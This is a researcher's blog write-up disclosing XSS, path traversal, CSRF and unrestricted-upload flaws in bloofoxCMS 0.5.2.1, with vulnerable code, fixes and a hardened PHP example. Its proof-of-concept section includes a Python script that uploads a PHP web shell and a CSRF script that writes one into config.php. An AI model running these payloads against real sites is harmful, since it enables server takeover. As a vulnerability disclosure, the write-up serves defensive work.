Hi there, I'm Mohammed Muteb from Saudi Arabia, Cybersecurity Researcher & Programmer. I blog about Cybersecurity, Programming & other things, currently studying at the Saudi Electronic University & playing CTF w/ SaudiPwners, acknowledged by IBM | Twitter | Snapchat | AT&T | Google | Node.js | Dropbox | Facebook | Tumblr | Sony

BloofoxCMS 0.5.2.1 - Multiple Vulnerabilities

In this write-up, I will talk about multiple vulnerabilities that I discovered a few months ago in bloofoxCMS: a reflected XSS, a directory traversal, a CSRF attack and an unrestricted file upload.

I was assigned a CVE for each of these findings in BloofoxCMS: path traversal CVE-2020-35762, session riding (CSRF) CVE-2020-35759, XSS CVE-2020-35761 and unrestricted file upload CVE-2020-35760.

Authenticated RXSS

I discovered an authenticated reflected XSS in the ‘fileurl’ parameter: the ‘fileurl’ value is echoed back into the page without any filtering in includes/inc_settings_editor.php :-

$tpl->set_var(array(
	"settings_title"      => "<h2>".get_caption('3000','Administration')." / ".get_caption('3650','Editor')."</h2>",
	"confirm_message"     => $ac->show_ok_message(GetConfirmMessage()),
	"editor_action"       => "index.php?mode=settings&page=editor",
	"editor_error"        => $error,
	"editor_file"         => $fileurl,
	"editor_file_input"   => "<textarea name='file' cols='80' rows='20'>".$file."</textarea>",
	"editor_fileurl"      => "<input type='hidden' name='fileurl' value='".$fileurl."' />",
	"editor_backlink"     => "<input type='hidden' name='backlink' value='".$backlink."' />",
	"editor_button_send"  => $ac->create_form_button("submit",get_caption('0120','Save')),
	"editor_button_reset" => $ac->create_form_button("reset",get_caption('0125','Reset'))
	));

PoC :- http://victim.com/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=[XSS Payload]

Fix:-

  • Use htmlspecialchars to escape the ‘fileurl’ value before it is echoed into the page.

Directory traversal

I discovered an authenticated path traversal in the ‘fileurl’ parameter: the ‘fileurl’ input is not checked for ‘.’, ‘/’, ‘\’ or Unicode sequences in includes/inc_settings_editor.php, and the value is passed straight to the filesystem functions, which leads to a path traversal vulnerability :-

// show file
if(isset($_POST["fileurl"])) {
	$fileurl = $_POST["fileurl"];
}
if(isset($_GET["fileurl"])) {
	$fileurl = "../".$_GET["fileurl"];
}

if(file_exists($fileurl)) {
	$filelength = filesize($fileurl);
	$readfile = fopen($fileurl,"r");
	$file = fread($readfile,$filelength);
	fclose($readfile);
}

PoC :- http://victim.com/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=../../../../../Windows/win.ini

Fix:-

  • Blacklist ‘.’, ‘/’, ‘\’ and Unicode sequences in ‘fileurl’ before it reaches file_exists()/fopen().
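Since the reflected XSS and the path traversal live in the same ‘fileurl’ handling, here is one hardened replacement for that code block. This is an added example, not bloofoxCMS code: it assumes the editor should only open files below a fixed base directory ($EDITOR_ROOT, a hypothetical name) and resolves the requested path with realpath() so that ‘../’, nested and encoded traversal sequences are collapsed before a containment check, rather than relying on a character blacklist alone; the value is then escaped with htmlspecialchars before being echoed.

```php
<?php
// Added example (not bloofoxCMS code): hardened fileurl handling for
// includes/inc_settings_editor.php. $EDITOR_ROOT is a hypothetical base
// directory; the editor must not open anything outside it.

function resolve_editor_file(string $base, string $requested): ?string {
    // Reject empty names, NUL bytes and backslashes outright; Windows
    // treats '\' as a separator and realpath() would follow it.
    if ($requested === '' || strpbrk($requested, "\0\\") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // realpath() collapses '.', '..' and symlinks, so any traversal
    // sequence becomes a concrete absolute path we can compare.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check: the resolved path must start with the base
    // directory plus a separator, so "/var/www/app2" is not treated as
    // being inside "/var/www/app".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

$EDITOR_ROOT = __DIR__ . '/../templates';   // hypothetical editor base dir
$fileurl = $_POST['fileurl'] ?? $_GET['fileurl'] ?? '';
$path = resolve_editor_file($EDITOR_ROOT, $fileurl);
$file = '';
$error = '';
if ($path === null) {
    $error = 'Invalid file.';
} else {
    $file = file_get_contents($path);
}

// Escape before interpolating into the HTML attribute and the textarea
// body (fixes the reflected XSS in the same parameter).
$safeFileurl = htmlspecialchars($fileurl, ENT_QUOTES | ENT_HTML5, 'UTF-8');
$safeFile    = htmlspecialchars($file, ENT_QUOTES | ENT_HTML5, 'UTF-8');
$editor_fileurl    = "<input type='hidden' name='fileurl' value='" . $safeFileurl . "' />";
$editor_file_input = "<textarea name='file' cols='80' rows='20'>" . $safeFile . "</textarea>";
```

The two variables at the end are drop-in values for the "editor_fileurl" and "editor_file_input" keys of the $tpl->set_var() array shown above.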

Unrestricted File Upload

I discovered an authenticated unrestricted file upload in the profile action: the only protection in includes/inc_home_myprofile.php was a check on the MIME type of the ‘filename’ upload, which is the client-supplied Content-Type in $_FILES["filename"]["type"] :-

if($_FILES["filename"]["type"] != "image/gif" && $_FILES["filename"]["type"] != "image/jpeg" && $_FILES["filename"]["type"] != "image/pjpeg") {
    $picture_error = $ac->show_error_message(get_caption('9490','You can only upload pictures of type GIF and JPEG.'));
}

Because that value is supplied by the client, the check can be bypassed simply by declaring an image type while uploading a PHP file. PoC :-

import requests
sid = 'xxxxxxxxxxxxxxxxxxxxxxxxxx' # The Admin Session
url = "http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile"
data = {'username':'admin','send':'Save'}
r = requests.post(url, data=data, headers={'Cookie':'sid='+sid+';'},files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0]
print('Your Shell in http://localhost/bloofoxCMS/admin/media/images/profiles/'+r)

Fix:-

  • MIME type validation (server-side, not the client-supplied type)
  • Image size validation
  • File extension validation

CSRF Attack

I discovered a CSRF attack in bloofoxCMS/admin/index.php?mode=settings&page=editor: the editor form has no request validation (anti-CSRF token) to reject third-party requests, so a logged-in administrator who visits a malicious page can be made to change the content of any file the editor can reach on the web server (locally or remotely). PoC:-

<script>
var bloofox = new XMLHttpRequest();
bloofox.onreadystatechange = function() {
    if (this.readyState == 4) {
        alert('Done');
    }
};
bloofox.open("POST", "http://localhost/bloofoxCMS/admin/index.php?mode=settings&page=editor", true);
bloofox.withCredentials = true;
bloofox.send('file=%3C%3F%3D%60%24_GET%5B1%5D%60%3B&backlink=&fileurl=config.php&send=Save');
</script>

Fix:-

  • Add a per-session anti-CSRF token to the editor form and reject any POST whose token does not match server-side.
Thank You.